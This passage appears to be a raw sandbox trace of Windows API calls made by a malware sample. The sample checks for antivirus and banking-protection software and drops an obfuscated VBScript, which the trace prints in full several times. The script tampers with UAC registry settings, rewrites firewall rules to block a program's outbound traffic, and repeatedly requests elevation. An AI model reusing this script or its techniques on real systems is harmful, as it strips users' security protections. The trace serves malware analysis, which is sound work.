lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671580570) returned 1 [0221.413] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4bc | out: lpPerformanceCount=0x68ff4bc*=16438671580721) returned 1 [0221.413] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671580840) returned 1 [0221.413] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4bc | out: lpPerformanceCount=0x68ff4bc*=16438671581255) returned 1 [0221.413] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671581639) returned 1 [0221.414] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4bc | out: lpPerformanceCount=0x68ff4bc*=16438671581803) returned 1 [0221.414] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671582178) returned 1 [0221.414] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4bc | out: lpPerformanceCount=0x68ff4bc*=16438671582334) returned 1 [0221.414] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671582450) returned 1 [0221.414] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4bc | out: lpPerformanceCount=0x68ff4bc*=16438671582601) returned 1 [0221.414] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671582719) returned 1 [0221.414] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4b8 | out: lpPerformanceCount=0x68ff4b8*=16438671582859) returned 1 [0221.414] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671582976) returned 1 [0221.414] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4b8 | out: lpPerformanceCount=0x68ff4b8*=16438671583376) returned 1 [0221.414] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671583505) returned 1 [0221.415] GetUserNameW (in: lpBuffer=0x68ff408, pcbBuffer=0x68ff404 | out: lpBuffer="DSsDPMx042", pcbBuffer=0x68ff404) returned 1 [0221.415] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671584548) returned 1 [0221.415] GetFileAttributesW (lpFileName="C:\\Program Files\\AVAST Software") returned 0xffffffff [0221.415] GetLastError () returned 0x2 [0221.415] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\AVAST Software") returned 0xffffffff [0221.416] GetLastError () returned 0x3 [0221.416] GetFileAttributesW (lpFileName="C:\\Program Files\\AVG") returned 0xffffffff [0221.416] GetLastError () returned 0x2 [0221.416] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\AVG") returned 0xffffffff [0221.416] GetLastError () returned 0x3 [0221.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Alwil Software") returned 0xffffffff [0221.416] GetLastError () returned 0x2 [0221.416] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Alwil Software") returned 0xffffffff [0221.417] GetLastError () returned 0x3 [0221.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Symantec") returned 0xffffffff [0221.417] GetLastError () returned 0x2 [0221.417] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Symantec") returned 0xffffffff [0221.417] GetLastError () returned 0x3 [0221.417] GetFileAttributesW (lpFileName="C:\\Program Files\\Symantec AntiVirus") returned 0xffffffff [0221.417] GetLastError () returned 0x2 [0221.417] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Symantec AntiVirus") returned 0xffffffff [0221.418] GetLastError () returned 0x3 [0221.418] GetFileAttributesW (lpFileName="C:\\Program Files\\Avira") returned 0xffffffff [0221.418] GetLastError () returned 0x2 [0221.418] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Avira") returned 0xffffffff [0221.418] GetLastError () returned 0x3 [0221.418] GetFileAttributesW (lpFileName="C:\\Program Files\\VBA32") returned 0xffffffff [0221.418] GetLastError () returned 0x2 [0221.418] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\VBA32") returned 0xffffffff [0221.419] GetLastError () returned 0x3 [0221.419] GetFileAttributesW (lpFileName="C:\\Program Files\\DrWeb") returned 0xffffffff [0221.419] GetLastError () returned 0x2 [0221.419] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\DrWeb") returned 0xffffffff [0221.419] GetLastError () returned 0x3 [0221.419] GetFileAttributesW (lpFileName="C:\\Program Files\\ESET") returned 0xffffffff [0221.419] GetLastError () returned 0x2 [0221.419] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\ESET") returned 0xffffffff [0221.420] GetLastError () returned 0x3 [0221.420] GetFileAttributesW (lpFileName="C:\\Program Files\\McAfee") returned 0xffffffff [0221.420] GetLastError () returned 0x2 [0221.420] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\McAfee") returned 0xffffffff [0221.420] GetLastError () returned 0x3 [0221.420] GetFileAttributesW (lpFileName="C:\\Program Files\\Eset") returned 0xffffffff [0221.420] GetLastError () returned 0x2 [0221.420] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Eset") returned 0xffffffff [0221.421] GetLastError () returned 0x3 [0221.421] GetFileAttributesW (lpFileName="C:\\Program Files\\COMODO") returned 0xffffffff [0221.421] GetLastError () returned 0x2 [0221.421] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\COMODO") returned 0xffffffff [0221.421] GetLastError () returned 0x3 [0221.421] GetFileAttributesW (lpFileName="C:\\Program Files\\Kaspersky Lab") returned 0xffffffff [0221.422] GetLastError () returned 0x2 [0221.422] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Kaspersky Lab") returned 0xffffffff [0221.422] GetLastError () returned 0x3 [0221.422] GetFileAttributesW (lpFileName="C:\\Program Files\\Bitdefender") returned 0xffffffff [0221.422] GetLastError () returned 0x2 [0221.422] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Bitdefender") returned 0xffffffff [0221.422] GetLastError () returned 0x3 [0221.422] GetFileAttributesW (lpFileName="C:\\Program Files\\DrWeb") returned 0xffffffff [0221.423] GetLastError () returned 0x2 [0221.423] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\DrWeb") returned 0xffffffff [0221.423] GetLastError () returned 0x3 [0221.423] GetFileAttributesW (lpFileName="C:\\Program Files\\AVG\\AVG2015") returned 0xffffffff [0221.423] GetLastError () returned 0x3 [0221.423] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\AVG\\AVG2015") returned 0xffffffff [0221.423] GetLastError () returned 0x3 [0221.424] GetFileAttributesW (lpFileName="C:\\Program Files\\GbPlugin") returned 0xffffffff [0221.424] GetLastError () returned 0x2 [0221.424] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\GbPlugin") returned 0xffffffff [0221.424] GetLastError () returned 0x3 [0221.424] GetFileAttributesW (lpFileName="C:\\Program Files\\GbPlugin") returned 0xffffffff [0221.424] GetLastError () returned 0x2 [0221.424] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\GbPlugin") returned 0xffffffff [0221.424] GetLastError () returned 0x3 [0221.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Diebold") returned 0xffffffff [0221.425] GetLastError () returned 0x2 [0221.425] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Diebold") returned 0xffffffff [0221.425] GetLastError () returned 0x3 [0221.425] GetFileAttributesW (lpFileName="C:\\Program Files\\Diebold") returned 0xffffffff [0221.425] GetLastError () returned 0x2 [0221.425] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Diebold") returned 0xffffffff [0221.425] GetLastError () returned 0x3 [0221.425] GetUserNameW (in: lpBuffer=0x68ff408, pcbBuffer=0x68ff404 | out: lpBuffer="DSsDPMx042", pcbBuffer=0x68ff404) returned 1 [0221.426] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671604741) returned 1 [0221.426] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4bc | out: lpPerformanceCount=0x68ff4bc*=16438671604862) returned 1 [0221.426] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671605253) returned 1 [0221.426] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671605387) returned 1 [0221.426] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671605508) returned 1 [0221.426] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671605626) returned 1 [0221.426] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671605743) returned 1 [0221.426] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671605858) returned 1 [0221.427] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671605973) returned 1 [0221.427] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4c4 | out: lpPerformanceCount=0x68ff4c4*=16438671606332) returned 1 [0221.427] QueryPerformanceCounter (in: lpPerformanceCount=0x68ff4bc | out: lpPerformanceCount=0x68ff4bc*=16438671606448) returned 1 [0221.427] GetFileAttributesW (lpFileName="C:\\Users\\Public\\") returned 0x11 [0221.427] GetComputerNameW (in: lpBuffer=0x71e03cc, nSize=0x68ff4c0 | out: lpBuffer="N3EERVTWSM", nSize=0x68ff4c0) returned 1 [0221.427] GetComputerNameW (in: lpBuffer=0x71e03f4, nSize=0x68ff4fc | out: lpBuffer="N3EERVTWSM", nSize=0x68ff4fc) returned 1 [0221.427] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3E.vbs" (normalized: "c:\\users\\public\\n3eg\\n3e.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x944 [0221.429] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", cchWideChar=4199, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4199 [0221.429] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", cchWideChar=4199, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4199 [0221.429] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="On Error Resume Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 